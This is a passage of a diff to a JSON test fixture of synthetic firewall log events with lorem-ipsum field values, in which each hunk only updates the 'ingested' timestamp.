policyid=mqu policytype=pteursi crscore=98.596000 craction=expl crlevel=essecill appcat=totamre service=rpo srccountry=velites dstcountry=nonpro trandisp=nula tranip=10.153.166.133 tranport=4638 duration=39.506000 sentbyte=6610 rcvdbyte=1936 sentpkt=olu app=imide", "event": { - "ingested": "2021-06-29T09:33:01.618292900Z" + "ingested": "2021-12-09T13:37:31.906971800Z" }, "tags": [ "preserve_original_event" 
@@ -366,7 +366,7 @@ }, "message": "date=2017-4-2 time=1:27:07 logver=amn devid=itessequ devname=porissu logid=umd type=sumd subtype=sectetur level=low vd=aUtenima srcip=10.62.10.137 srcport=5596 srcintf=lo6539 dstip=10.138.249.251 dstport=630 dstintf=eth1576 poluuid=deritinv sessionid=evelite proto=6 action=accept policyid=stiaecon trandisp=usBono duration=155.835000 sentbyte=3942 rcvdbyte=5360 devtype=ttenb osname=olor osversion=1.5978 mastersrcmac=lapa srcmac=01:00:5e:b0:3e:44 crscore=105.845000 craction=lors crlevel=oluptat eventtype=enimad user=tis service=qua hostname=con6049.internal.lan profile=quelaud reqtype=luptat url=https://internal.example.com/temse/caecat.jpg?emeu=tatemac#quisn direction=inbound msg=teursint method=etMa cat=llita catdesc=ntsunt device_id=nturmag log_id=uredol pri=high userfrom=temsequi adminprof=mquia timezone=ET main_type=enbyCic trigger_policy=iveli sub_type=conseq severity_level=itame policy=tenat src=10.63.171.91 src_port=4396 dst=10.48.25.200 dst_port=5179 http_method=nse http_url=mveniam http_host=tuser http_agent=mmo http_session_id=eve signature_subclass=nbyCicer signature_id=6129 srccountry=ciad content_switch_name=ugiatqu server_pool_name=eruntmo false_positive_mitigation=nimve user_name=usanti monitor_status=ion http_refer=https://mail.example.org/gelits/iavo.txt?udexerc=ovolupta#volup http_version=macc dev_id=ria threat_weight=beat history_threat_weight=rro threat_level=tuser ftp_mode=ctasu ftp_cmd=irat cipher_suite=sitame msg_id=oinven", "event": { - "ingested": "2021-06-29T09:33:01.618301400Z" + "ingested": "2021-12-09T13:37:31.906975400Z" }, "tags": [ "preserve_original_event" 
@@ -378,7 +378,7 @@ }, "message": "logver=ute dtime=2017-04-16 08:29:41.792538723 +0000 UTC devid=mexer devname=iam vd=Bonoru date=2017-4-16 time=8:29:41 logid=rcitati type=nula subtype=ameaquei level=low eventtime=adipi logtime=mquis srcip=10.174.17.46 srcport=2743 srcintf=eth6814 srcintfrole=ine dstip=10.77.105.81 dstport=4455 dstintf=enp0s7799 dstintfrole=orem poluuid=giatqu sessionid=rsint proto=udp action=allow policyid=paq policytype=uianon crscore=60.762000 craction=uisautem crlevel=mquameiu appcat=loremq service=turmagni srccountry=ores dstcountry=ddoe trandisp=uid tranip=10.38.168.190 tranport=7260 duration=129.140000 sentbyte=368 rcvdbyte=7791 sentpkt=incidi app=aedictas", "event": { - "ingested": "2021-06-29T09:33:01.618305600Z" + "ingested": "2021-12-09T13:37:31.906980Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "logver=temaccus devname=\"ons\" devid=\"unt\" vd=liq date=2017-4-30 time=3:32:16 logid=abore type=iumdo subtype=oreeu level=high eventtime=exe logtime=tis srcip=10.36.99.207 srcport=4829 srcintf=lo497 srcintfrole=tvol dstip=10.225.37.73 dstport=5630 dstintf=eth1882 dstintfrole=eniamqu poluuid=iumt sessionid=porissus proto=udp action=cancel policyid=tsunt policytype=rnat crscore=88.508000 craction=ured crlevel=ctetu appcat=oreeu service=uasiarch srccountry=Malor dstcountry=boriosa trandisp=cillumdo tranip=10.166.142.198 tranport=4151 duration=1.040000 sentbyte=465 rcvdbyte=7663 sentpkt=oreetd app=lor", "event": { - "ingested": "2021-06-29T09:33:01.618312100Z" + "ingested": "2021-12-09T13:37:31.906986200Z" }, "tags": [ "preserve_original_event" 
@@ -402,7 +402,7 @@ }, "message": "logver=etc devname=\"eturadip\" devid=\"nost\" vd=atus date=2017-5-14 time=10:34:50 logid=tassitas type=obea subtype=velite level=medium eventtime=litse logtime=san srcip=10.66.90.225 srcport=4846 srcintf=lo4891 srcintfrole=moenimi dstip=10.214.156.161 dstport=3854 dstintf=eth1188 dstintfrole=ati poluuid=rauto sessionid=doloreeu proto=6 action=block policyid=eumfu policytype=docons crscore=3.408000 craction=eumf crlevel=roquisq appcat=uasi service=maveniam srccountry=uis dstcountry=lill trandisp=remeum tranip=10.145.194.12 tranport=1001 duration=25.398000 sentbyte=6452 rcvdbyte=6820 sentpkt=aturE app=umto", "event": { - "ingested": "2021-06-29T09:33:01.618317400Z" + "ingested": "2021-12-09T13:37:31.906991500Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "logver=pariat devname=\"iutal\" devid=\"teturad\" vd=ese date=2017-5-29 time=5:37:24 logid=eddoei type=lorumw subtype=eca level=medium eventtime=nimve logtime=duntut srcip=10.6.242.108 srcport=3373 srcintf=lo3230 srcintfrole=qua dstip=10.156.208.5 dstport=7612 dstintf=lo1800 dstintfrole=quisn poluuid=pteu sessionid=uatD proto=0 action=cancel policyid=antiu policytype=velillum crscore=166.389000 craction=iatquovo crlevel=lapari appcat=Mal service=itinvo srccountry=snulap dstcountry=cidu trandisp=hilmol tranip=10.163.36.101 tranport=253 duration=72.488000 sentbyte=1880 rcvdbyte=4638 sentpkt=ident app=scip", "event": { - "ingested": "2021-06-29T09:33:01.618323Z" + "ingested": "2021-12-09T13:37:31.906997600Z" }, "tags": [ "preserve_original_event" 
@@ -426,7 +426,7 @@ }, "message": "date=2017-6-12 time=12:39:58 devname=uamqu device_id=iusmodi log_id=esciun type=generic subtype=tasnul pri=medium devid=ccusant devname=epteurs logid=rmag type=quisquam subtype=eporroqu level=very-high vd=dit srcip=10.25.134.171 srcport=7867 srcintf=eth4543 dstip=10.43.235.230 dstport=2198 dstintf=lo4581 poluuid=BCSe sessionid=rem proto=0 action=allow policyid=eeufug trandisp=ntin duration=6.686000 sentbyte=5763 rcvdbyte=1048 devtype=cinge osname=tatem osversion=1.4713 mastersrcmac=eritqu srcmac=01:00:5e:ed:6b:57 crscore=10.603000 craction=nimip crlevel=iutaliq eventtype=olore user=onemul service=trudexe hostname=remeum2641.www5.corp profile=Quisa reqtype=quiav url=https://www5.example.com/elit/sam.htm?nevolu=unt#isni direction=outbound msg=ecillum method=olor cat=amei catdesc=doconseq device_id=conseq log_id=emve pri=very-high userfrom=tiu adminprof=wri timezone=GMT-07:00 main_type=asper trigger_policy=dictasun sub_type=psa severity_level=lorese policy=olupta src=10.220.148.127 src_port=6681 dst=10.68.233.163 dst_port=3126 http_method=itanimi http_url=onoru http_host=data http_agent=ugits http_session_id=ittenb signature_subclass=tobeatae signature_id=5617 srccountry=quis content_switch_name=exe server_pool_name=naa false_positive_mitigation=equat user_name=estiaec monitor_status=pitlabo http_refer=https://example.net/rcitat/ree.htm?ionofdeF=rsp#imipsa http_version=nostrum dev_id=autodita threat_weight=ntut history_threat_weight=temveleu threat_level=itametco ftp_mode=etcons ftp_cmd=etco cipher_suite=iuntN msg_id=utfugi", "event": { - "ingested": "2021-06-29T09:33:01.618330700Z" + "ingested": "2021-12-09T13:37:31.907003400Z" }, "tags": [ "preserve_original_event" 
@@ -438,7 +438,7 @@ }, "message": "logver=isnostru date=2017-6-26 time=7:42:33 log_id=nul devid=ntocca devname=trudex logid=tvol type=lup subtype=mipsamv level=medium vd=qua srcip=10.249.194.7 srcport=4987 srcintf=enp0s2282 dstip=10.57.116.17 dstport=90 dstintf=enp0s7442 poluuid=xcep sessionid=gnidol proto=0 action=allow policyid=uaeab trandisp=ptat duration=136.310000 sentbyte=1078 rcvdbyte=6196 devtype=eturadip osname=amquaera osversion=1.4481 mastersrcmac=equ srcmac=01:00:5e:00:fd:79 crscore=18.750000 craction=olesti crlevel=edquia eventtype=ihi user=undeomn service=ape hostname=itaspe3216.localdomain profile=onsecte reqtype=prehende url=https://example.org/porro/issu.htm?inculpa=ruredol#iadeseru direction=unknown msg=numq method=quae cat=periam catdesc=ain device_id=umiurer log_id=mquido pri=very-high userfrom=onorume adminprof=abill timezone=GMT+02:00 main_type=uov trigger_policy=mini sub_type=mve severity_level=tionev policy=uasiarch src=10.116.82.108 src_port=7276 dst=10.94.177.125 dst_port=6683 http_method=nimides http_url=olorsit http_host=naaliq http_agent=plica http_session_id=asiarc signature_subclass=lor signature_id=5152 srccountry=snula content_switch_name=pici server_pool_name=bori false_positive_mitigation=dipi user_name=ecatc monitor_status=quovolu http_refer=https://example.net/itse/sse.gif?lupt=quatur#dminim http_version=ptatevel dev_id=aperiame threat_weight=stenat history_threat_weight=uianonnu threat_level=tatiset ftp_mode=quira ftp_cmd=ciatisun cipher_suite=duntutl msg_id=nven", "event": { - "ingested": "2021-06-29T09:33:01.618338300Z" + "ingested": "2021-12-09T13:37:31.907009100Z" }, "tags": [ "preserve_original_event" 
@@ -450,7 +450,7 @@ }, "message": "date=2017-7-11 time=2:45:07 devname=saq device_id=asiarch log_id=ssuscipi type=generic subtype=utla pri=medium devid=tquovo devname=fugi logid=nse type=nesciu subtype=todit level=very-high vd=inrepreh srcip=10.14.192.162 srcport=2536 srcintf=enp0s4429 dstip=10.179.128.6 dstport=3375 dstintf=enp0s4580 poluuid=ptate sessionid=volupta proto=3 action=cancel policyid=utla trandisp=emi duration=171.651000 sentbyte=3313 rcvdbyte=7131 devtype=velites osname=oloremi osversion=1.4442 mastersrcmac=apari srcmac=01:00:5e:0c:fb:2b crscore=140.065000 craction=uel crlevel=fficiad eventtype=teirured user=nostru service=rcit hostname=mea6298.api.example profile=eumiu reqtype=tatevel url=https://mail.example.org/uamquaer/texplica.gif?sequa=lorum#suntexpl direction=inbound msg=Sedut method=tatis cat=audant catdesc=obeata device_id=uredol log_id=uptat pri=low userfrom=entorev adminprof=quuntur timezone=GMT+02:00 main_type=exercit trigger_policy=dexer sub_type=idolor severity_level=onpr policy=uira src=10.115.121.243 src_port=550 dst=10.113.152.241 dst_port=2330 http_method=ali http_url=udexerci http_host=uae http_agent=imveni http_session_id=econ signature_subclass=aborio signature_id=1122 srccountry=setquas content_switch_name=nbyCi server_pool_name=runtmoll false_positive_mitigation=busBon user_name=norumetM monitor_status=isno http_refer=https://internal.example.com/ameaq/Quis.html?lestiae=iav#umiure http_version=isiut dev_id=tin threat_weight=rporiss history_threat_weight=billoinv threat_level=etconse ftp_mode=nesciu ftp_cmd=mali cipher_suite=roinBCSe msg_id=eetdolor", "event": { - "ingested": "2021-06-29T09:33:01.618342300Z" + "ingested": "2021-12-09T13:37:31.907014800Z" }, "tags": [ "preserve_original_event" 
@@ -462,7 +462,7 @@ }, "message": "date=2017-7-25 time=9:47:41 logver=upt devid=equamni devname=atcupi logid=enima type=uptateve subtype=fugitsed level=medium vd=lorem srcip=10.68.159.207 srcport=3320 srcintf=enp0s7206 dstip=10.139.195.188 dstport=893 dstintf=enp0s6960 poluuid=lits sessionid=tvolu proto=17 action=accept policyid=ollitan trandisp=temseq duration=0.684000 sentbyte=3045 rcvdbyte=6863 devtype=edictasu osname=eturadi osversion=1.3804 mastersrcmac=edquiano srcmac=01:00:5e:09:79:f2 crscore=11.231000 craction=taevitae crlevel=tevel eventtype=tatemse user=gitsed service=agn hostname=iqu7510.internal.corp profile=equeporr reqtype=amremap url=https://www5.example.org/aqu/utemvele.gif?serrorsi=tsedquia#rsit direction=unknown msg=ntutlabo method=idex cat=nihilmo catdesc=reetdo device_id=xeaco log_id=taliqu pri=medium userfrom=hite adminprof=umfugi timezone=CT main_type=dminimve trigger_policy=remips sub_type=laboreet severity_level=uptate policy=tot src=10.49.82.45 src_port=435 dst=10.179.153.97 dst_port=1908 http_method=ade http_url=nihilmol http_host=nder http_agent=ano http_session_id=rumexer signature_subclass=eab signature_id=2387 srccountry=saquaeab content_switch_name=eli server_pool_name=rissusci false_positive_mitigation=ectetur user_name=dictasun monitor_status=inimv http_refer=https://api.example.org/volup/untNeq.htm?mremaper=uteirur#ntium http_version=ide dev_id=quunturm threat_weight=quovo history_threat_weight=quaturve threat_level=ntiumdol ftp_mode=conse ftp_cmd=aturve cipher_suite=edqui msg_id=tvolu", "event": { - "ingested": "2021-06-29T09:33:01.618346600Z" + "ingested": "2021-12-09T13:37:31.907020500Z" }, "tags": [ "preserve_original_event" 
@@ -474,7 +474,7 @@ }, "message": "logver=ore devname=\"lors\" devid=\"saute\" vd=ecillumd date=2017-8-8 time=4:50:15 logid=iumto type=sequatu subtype=tiumtot level=medium eventtime=mdoloree logtime=que srcip=10.98.52.184 srcport=7402 srcintf=eth3784 srcintfrole=ita dstip=10.99.55.115 dstport=1537 dstintf=eth855 dstintfrole=isnostru poluuid=iad sessionid=ngelits proto=tcp action=accept policyid=billoi policytype=reseo crscore=158.047000 craction=uov crlevel=pariat appcat=icaboNe service=boreetd srccountry=uir dstcountry=rumex trandisp=ectobea tranip=10.205.83.138 tranport=6239 duration=170.113000 sentbyte=3290 rcvdbyte=722 sentpkt=ibus app=lumdol", "event": { - "ingested": "2021-06-29T09:33:01.618350100Z" + "ingested": "2021-12-09T13:37:31.907026200Z" }, "tags": [ "preserve_original_event" @@ -486,7 +486,7 @@ }, "message": "logver=onnu devname=\"reprehe\" devid=\"metMa\" vd=emoen date=2017-8-22 time=11:52:50 logid=ptate type=mipsumqu subtype=turad level=high eventtime=billo logtime=doloremi srcip=10.197.128.162 srcport=2052 srcintf=lo6750 srcintfrole=ionof dstip=10.90.189.248 dstport=1293 dstintf=lo2402 dstintfrole=roi poluuid=reh sessionid=volup proto=prm action=allow policyid=iconsequ policytype=ueporr crscore=127.832000 craction=archite crlevel=tur appcat=ddo service=emp srccountry=inBC dstcountry=did trandisp=atcupi tranip=10.228.11.50 tranport=984 duration=3.401000 sentbyte=6907 rcvdbyte=422 sentpkt=mcol app=tion", "event": { - "ingested": "2021-06-29T09:33:01.618355400Z" + "ingested": "2021-12-09T13:37:31.907032400Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "date=2017-9-6 time=6:55:24 devname=moll device_id=roinBCS log_id=odit type=event subtype=vol pri=low desc=aloru user=cteturad userfrom=modi msg=cip action=deny adom=ntoccae2859.www.test session_id=incididu", "event": { - "ingested": "2021-06-29T09:33:01.618363Z" + "ingested": "2021-12-09T13:37:31.907038100Z" }, "tags": [ "preserve_original_event" 
@@ -510,7 +510,7 @@ }, "message": "date=2017-9-20 time=1:57:58 devname=uinesci device_id=otamr log_id=tsed type=generic subtype=rExc pri=medium devid=saute devname=umdol logid=rerepr type=ipiscin subtype=trudexe level=high vd=ineavol srcip=10.29.34.211 srcport=5638 srcintf=eth1805 dstip=10.161.15.82 dstport=6598 dstintf=enp0s5799 poluuid=aco sessionid=eFini proto=17 action=cancel policyid=mipsa trandisp=uas duration=118.122000 sentbyte=1737 rcvdbyte=6283 devtype=umexe osname=xce osversion=1.7318 mastersrcmac=suntex srcmac=01:00:5e:5b:68:89 crscore=29.865000 craction=rcitati crlevel=siutali eventtype=uiratio user=ficia service=orsit hostname=deFinibu3940.internal.lan profile=rautod reqtype=onorumet url=https://www5.example.com/etcon/chit.txt?erspici=itinvolu#adeserun direction=unknown msg=tinv method=Utenima cat=nse catdesc=umq device_id=enim log_id=oreve pri=low userfrom=snisiu adminprof=atem timezone=ET main_type=vento trigger_policy=litsed sub_type=ciun severity_level=rehender policy=tetura src=10.124.71.88 src_port=7540 dst=10.22.248.52 dst_port=6566 http_method=cons http_url=tinvolu http_host=ptat http_agent=amquisn http_session_id=Finibus signature_subclass=nsequat signature_id=3661 srccountry=scipi content_switch_name=rem server_pool_name=reh false_positive_mitigation=rsitame user_name=tcons monitor_status=squamest http_refer=https://mail.example.com/emveleum/siuta.html?ate=epteur#onproi http_version=usmodit dev_id=orese threat_weight=umdolore history_threat_weight=umqui threat_level=adipisci ftp_mode=eir ftp_cmd=ull cipher_suite=tlabor msg_id=itecto", "event": { - "ingested": "2021-06-29T09:33:01.618370400Z" + "ingested": "2021-12-09T13:37:31.907043800Z" }, "tags": [ "preserve_original_event" 
@@ -522,7 +522,7 @@ }, "message": "date=2017-10-4 time=9:00:32 logver=ametcons devid=velite devname=ipexeac logid=explicab type=samvolu subtype=teiru level=low vd=orinrep srcip=10.228.213.136 srcport=7247 srcintf=lo1719 dstip=10.185.107.27 dstport=2257 dstintf=enp0s4999 poluuid=iduntutl sessionid=mipsumd proto=udp action=block policyid=quelauda trandisp=rcit duration=166.303000 sentbyte=7229 rcvdbyte=6230 devtype=orese osname=evelite osversion=1.4895 mastersrcmac=oremipsu srcmac=01:00:5e:cd:f6:0e crscore=37.237000 craction=equunt crlevel=mto eventtype=iae user=dent service=Uten hostname=tatiset4191.localdomain profile=aconseq reqtype=mquamei url=https://api.example.org/fug/liquid.txt?ptate=lloi#nseq direction=external msg=isetqua method=ianonn cat=oluptas catdesc=doe device_id=quipex log_id=rchitect pri=very-high userfrom=Bonor adminprof=ipex timezone=PT main_type=upta trigger_policy=ivel sub_type=tmollita severity_level=tionofd policy=iatnula src=10.185.37.176 src_port=1859 dst=10.26.58.20 dst_port=2809 http_method=essequam http_url=undeo http_host=ficiade http_agent=uiinea http_session_id=uianonn signature_subclass=eavolupt signature_id=784 srccountry=elitsedq content_switch_name=liquam server_pool_name=sinto false_positive_mitigation=edi user_name=eumiure monitor_status=ore http_refer=https://internal.example.com/mSe/sis.gif?rchite=rcit#orumwri http_version=tiae dev_id=giat threat_weight=nculpa history_threat_weight=olupt threat_level=tvol ftp_mode=ostru ftp_cmd=mea cipher_suite=tuserror msg_id=agnama", "event": { - "ingested": "2021-06-29T09:33:01.618374700Z" + "ingested": "2021-12-09T13:37:31.907049800Z" }, "tags": [ "preserve_original_event" 
@@ -534,7 +534,7 @@ }, "message": "logver=deritq dtime=2017-10-19 04:03:07.172538723 +0000 UTC devid=boreetdo devname=teni vd=iin date=2017-10-19 time=4:03:07 logid=nostr type=luptatem subtype=tNequepo level=low eventtime=eumfug logtime=sper srcip=10.200.12.126 srcport=2347 srcintf=enp0s7374 srcintfrole=liqu dstip=10.14.145.107 dstport=4362 dstintf=enp0s7861 dstintfrole=aliq poluuid=utem sessionid=oreetd proto=HOPOPT action=block policyid=Nequepo policytype=edictas crscore=55.933000 craction=tur crlevel=borisnis appcat=elitsedd service=hitecto srccountry=loremi dstcountry=nven trandisp=isci tranip=10.250.231.196 tranport=5863 duration=4.105000 sentbyte=2763 rcvdbyte=5047 sentpkt=aquioff app=cip", "event": { - "ingested": "2021-06-29T09:33:01.618380Z" + "ingested": "2021-12-09T13:37:31.907055500Z" }, "tags": [ "preserve_original_event" @@ -546,7 +546,7 @@ }, "message": "logver=onsequat dtime=2017-11-02 11:05:41.432538723 +0000 UTC devid=tiumd devname=atuse vd=imad date=2017-11-2 time=11:05:41 logid=tura type=equuntur subtype=rve level=high eventtime=mqua logtime=xer srcip=10.225.34.176 srcport=5569 srcintf=lo2867 srcintfrole=amquisn dstip=10.21.203.112 dstport=5930 dstintf=enp0s1294 dstintfrole=sum poluuid=lloinve sessionid=eni proto=HOPOPT action=cancel policyid=edquiac policytype=psamvolu crscore=80.314000 craction=unturma crlevel=iavol appcat=psumdol service=urautodi srccountry=equamni dstcountry=fugia trandisp=uptate tranip=10.103.36.192 tranport=1974 duration=129.001000 sentbyte=2801 rcvdbyte=2565 sentpkt=imidest app=citation", "event": { - "ingested": "2021-06-29T09:33:01.618384500Z" + "ingested": "2021-12-09T13:37:31.907061900Z" }, "tags": [ "preserve_original_event" 
@@ -558,7 +558,7 @@ }, "message": "logver=nof devname=\"usantiu\" devid=\"periam\" vd=remip date=2017-11-16 time=6:08:15 logid=dexea type=aturExc subtype=antiumto level=low eventtime=obe logtime=niamqu srcip=10.140.59.161 srcport=3599 srcintf=eth575 srcintfrole=tev dstip=10.5.67.140 dstport=5687 dstintf=enp0s6143 dstintfrole=intoc poluuid=obeataev sessionid=rrorsit proto=udp action=accept policyid=umquid policytype=olabo crscore=79.046000 craction=dolor crlevel=rsp appcat=quir service=giatqu srccountry=olors dstcountry=roid trandisp=lorum tranip=10.118.111.183 tranport=5410 duration=96.462000 sentbyte=6821 rcvdbyte=6222 sentpkt=mipsu app=nvol", "event": { - "ingested": "2021-06-29T09:33:01.618390800Z" + "ingested": "2021-12-09T13:37:31.907068800Z" }, "tags": [ "preserve_original_event" 
@@ -570,7 +570,7 @@ }, "message": "date=2017-12-1 time=1:10:49 logver=llu devid=quaUt devname=labor logid=oris type=tatemse subtype=uta level=very-high vd=tse srcip=10.170.104.148 srcport=5722 srcintf=lo259 dstip=10.60.92.40 dstport=5836 dstintf=enp0s4446 poluuid=dicons sessionid=BCSedutp proto=udp action=accept policyid=ritatise trandisp=nihilm duration=104.607000 sentbyte=6659 rcvdbyte=5351 devtype=isauteir osname=eritquii osversion=1.4493 mastersrcmac=uisno srcmac=01:00:5e:e9:ec:d5 crscore=34.736000 craction=itaed crlevel=invol eventtype=Loremips user=cidun service=tassitas hostname=nimadmi4084.api.home profile=eufugia reqtype=nor url=https://example.net/aturQui/tquii.html?uiac=squ#litess direction=unknown msg=involupt method=itempo cat=upt catdesc=rve device_id=amq log_id=abillo pri=high userfrom=ationem adminprof=Nem timezone=OMST main_type=ollita trigger_policy=dipisci sub_type=amnisiu severity_level=ptat policy=epr src=10.7.70.169 src_port=2514 dst=10.28.212.191 dst_port=1997 http_method=nostru http_url=Loremip http_host=veleumiu http_agent=rcita http_session_id=turad signature_subclass=sequamni signature_id=4799 srccountry=ollita content_switch_name=ectetu server_pool_name=radi false_positive_mitigation=ula user_name=itsed monitor_status=rad http_refer=https://internal.example.com/ididu/autodit.gif?seru=oriss#imadmin http_version=suntexpl dev_id=urve threat_weight=sBonoru history_threat_weight=everi threat_level=squ ftp_mode=emagnaal ftp_cmd=nih cipher_suite=ncididu msg_id=itati", "event": { - "ingested": "2021-06-29T09:33:01.618398300Z" + "ingested": "2021-12-09T13:37:31.907072900Z" }, "tags": [ "preserve_original_event" 
@@ -582,7 +582,7 @@ }, "message": "date=2017-12-15 time=8:13:24 logver=estla devid=ione devname=ecillum logid=maccu type=ame subtype=pitlabo level=very-high vd=urExc srcip=10.37.124.214 srcport=6919 srcintf=lo7727 dstip=10.37.111.228 dstport=7082 dstintf=enp0s20 poluuid=dmini sessionid=tquid proto=17 action=block policyid=iatisun trandisp=cto duration=144.899000 sentbyte=2372 rcvdbyte=7417 devtype=imadmini osname=iatisund osversion=1.6506 mastersrcmac=aUtenim srcmac=01:00:5e:28:0c:11 crscore=172.422000 craction=etdol crlevel=sed eventtype=uep user=ametco service=nde hostname=reprehe3525.www5.example profile=mquisno reqtype=eaco url=https://mail.example.org/mvele/teveli.htm?Nequepor=luptate#aturvel direction=internal msg=dexea method=sedquia cat=litesse catdesc=ntmo device_id=aliqu log_id=iqu pri=very-high userfrom=ationula adminprof=doconse timezone=CEST main_type=oreeufug trigger_policy=ptatems sub_type=tenima severity_level=emagnam policy=iaco src=10.148.197.60 src_port=5711 dst=10.143.144.52 dst_port=974 http_method=nvo http_url=lab http_host=sedqui http_agent=iuntNe http_session_id=tdolor signature_subclass=Ute signature_id=2191 srccountry=uepor content_switch_name=umSecti server_pool_name=eabil false_positive_mitigation=ibusB user_name=rporis monitor_status=etco http_refer=https://example.org/ereprehe/olu.html?liqu=ipsu#siarch http_version=itautfu dev_id=rrorsi threat_weight=ole history_threat_weight=odi threat_level=tper ftp_mode=olor ftp_cmd=corpo cipher_suite=commod msg_id=iumd", "event": { - "ingested": "2021-06-29T09:33:01.618405700Z" + "ingested": "2021-12-09T13:37:31.907077500Z" }, "tags": [ "preserve_original_event" 
@@ -594,7 +594,7 @@ }, "message": "logver=aborisn dtime=2017-12-29 15:15:58.472538723 +0000 UTC devid=onproid devname=sitv vd=equam date=2017-12-29 time=3:15:58 logid=bor type=ameaquei subtype=aeca level=very-high eventtime=aperiam logtime=ngelit srcip=10.217.145.137 srcport=5242 srcintf=enp0s6940 srcintfrole=orema dstip=10.22.149.132 dstport=7725 dstintf=lo7156 dstintfrole=neavolup poluuid=lits sessionid=Nemoen proto=0 action=block policyid=rur policytype=quaturve crscore=166.007000 craction=oeiusmod crlevel=uidolore appcat=iacon service=ncu srccountry=quaturve dstcountry=ciad trandisp=diconseq tranip=10.251.183.113 tranport=2604 duration=161.433000 sentbyte=5697 rcvdbyte=7299 sentpkt=eseosqu app=uptatem", "event": { - "ingested": "2021-06-29T09:33:01.618413100Z" + "ingested": "2021-12-09T13:37:31.907082700Z" }, "tags": [ "preserve_original_event" @@ -606,7 +606,7 @@ }, "message": "logver=uamnihil devname=\"nisi\" devid=\"imadm\" vd=siutali date=2018-1-12 time=10:18:32 logid=mfugi type=ceroinBC subtype=lorumw level=low eventtime=squir logtime=commod srcip=10.183.16.252 srcport=3150 srcintf=lo6718 srcintfrole=eabillo dstip=10.203.66.175 dstport=3904 dstintf=enp0s3868 dstintfrole=dipisciv poluuid=nsequun sessionid=hen proto=icmp action=accept policyid=velillum policytype=itamet crscore=123.013000 craction=hil crlevel=itl appcat=idolo service=ncidid srccountry=oid dstcountry=iarchit trandisp=volupt tranip=10.51.60.203 tranport=5315 duration=165.955000 sentbyte=7551 rcvdbyte=1519 sentpkt=ten app=Utenim", "event": { - "ingested": "2021-06-29T09:33:01.618420800Z" + "ingested": "2021-12-09T13:37:31.907087900Z" }, "tags": [ "preserve_original_event" 
@@ -618,7 +618,7 @@ }, "message": "date=2018-1-27 time=5:21:06 logver=uasiarch devid=iamquisn devname=magnama logid=reprehe type=citatio subtype=dolo level=medium vd=esciunt srcip=10.133.245.26 srcport=1727 srcintf=enp0s2674 dstip=10.76.87.30 dstport=2858 dstintf=enp0s2918 poluuid=remag sessionid=roinBCSe proto=HOPOPT action=accept policyid=labori trandisp=ditau duration=39.920000 sentbyte=5413 rcvdbyte=6650 devtype=tam osname=olu osversion=1.409 mastersrcmac=iut srcmac=01:00:5e:5c:c2:50 crscore=69.137000 craction=boris crlevel=ris eventtype=nisiuta user=utper service=uipexe hostname=ursint411.www.lan profile=gnamali reqtype=iumdo url=https://example.org/tem/iadeseru.jpg?olorsita=odoco#etc direction=internal msg=lamco method=natuser cat=Excepteu catdesc=omnis device_id=tati log_id=orinc pri=very-high userfrom=eturadi adminprof=cinge timezone=PT main_type=ira trigger_policy=niamq sub_type=quatD severity_level=nevol policy=lumquid src=10.157.14.165 src_port=7170 dst=10.61.200.105 dst_port=2813 http_method=tquov http_url=natu http_host=doei http_agent=acomm http_session_id=veleumi signature_subclass=volupt signature_id=6822 srccountry=itatise content_switch_name=ure server_pool_name=userro false_positive_mitigation=oree user_name=nimadmi monitor_status=utaliq http_refer=https://example.com/tinvolu/uredol.txt?did=lamcol#idolor http_version=tutlabor dev_id=nse threat_weight=rauto history_threat_weight=rese threat_level=nonproi ftp_mode=doconse ftp_cmd=henderi cipher_suite=tisunde msg_id=ende", "event": { - "ingested": "2021-06-29T09:33:01.618428200Z" + "ingested": "2021-12-09T13:37:31.907091800Z" }, "tags": [ "preserve_original_event" 
@@ -630,7 +630,7 @@ }, "message": "date=2018-2-10 time=12:23:41 logver=commod devid=oris devname=rcita logid=ataev type=oris subtype=incidi level=high vd=tutlabo srcip=10.32.66.161 srcport=881 srcintf=lo4523 dstip=10.134.238.8 dstport=2976 dstintf=enp0s1238 poluuid=edquiac sessionid=sit proto=HOPOPT action=allow policyid=olo trandisp=laboris duration=163.866000 sentbyte=7328 rcvdbyte=5375 devtype=tutl osname=nevolu osversion=1.5475 mastersrcmac=ostru srcmac=01:00:5e:e9:5f:84 crscore=157.516000 craction=aven crlevel=idolore eventtype=psaqu user=psa service=pta hostname=ididunt7607.mail.localhost profile=ntutlabo reqtype=leumiure url=https://mail.example.net/epteurs/usmodtem.gif?itvo=asi#tobe direction=internal msg=Lore method=oin cat=eritquii catdesc=taliqui device_id=ecatcu log_id=entoreve pri=high userfrom=umquam adminprof=onev timezone=CET main_type=tionev trigger_policy=ali sub_type=ionu severity_level=perna policy=moll src=10.242.178.15 src_port=3948 dst=10.217.111.77 dst_port=7309 http_method=datatno http_url=equepor http_host=antium http_agent=ugiatn http_session_id=utpe signature_subclass=hend signature_id=1170 srccountry=agnamali content_switch_name=ptateve server_pool_name=aliqua false_positive_mitigation=officiad user_name=nimadmin monitor_status=iavol http_refer=https://example.net/iumtota/qui.jpg?quel=ugitsed#ritatis http_version=olor dev_id=emoenim threat_weight=turadipi history_threat_weight=umSec threat_level=onsecte ftp_mode=inibusBo ftp_cmd=tqui cipher_suite=sequun msg_id=nimadm", "event": { - "ingested": "2021-06-29T09:33:01.618435600Z" + "ingested": "2021-12-09T13:37:31.907095800Z" }, "tags": [ "preserve_original_event" 
@@ -642,7 +642,7 @@ }, "message": "date=2018-2-24 time=7:26:15 logver=vitaedic devid=remip devname=rsita logid=rehe type=aper subtype=gnaa level=low vd=uta srcip=10.161.128.235 srcport=6280 srcintf=eth2121 dstip=10.84.29.117 dstport=1245 dstintf=eth7500 poluuid=errorsi sessionid=umwr proto=HOPOPT action=cancel policyid=cupida trandisp=rinc duration=5.709000 sentbyte=289 rcvdbyte=6059 devtype=dquia osname=ommod osversion=1.142 mastersrcmac=dico srcmac=01:00:5e:06:53:8a crscore=35.836000 craction=imipsa crlevel=iscinge eventtype=ora user=meumfug service=inimve hostname=mco2906.domain profile=sitvolu reqtype=eratv url=https://www.example.com/iadolo/cidu.txt?aliquide=redolori#eav direction=inbound msg=nse method=turQuis cat=tat catdesc=pta device_id=henderi log_id=onsec pri=high userfrom=itaspern adminprof=tau timezone=GMT+02:00 main_type=rsintoc trigger_policy=boreetd sub_type=rehende severity_level=sitamet policy=xerc src=10.199.119.251 src_port=7286 dst=10.86.152.227 dst_port=850 http_method=ant http_url=tiu http_host=ommodoco http_agent=rehe 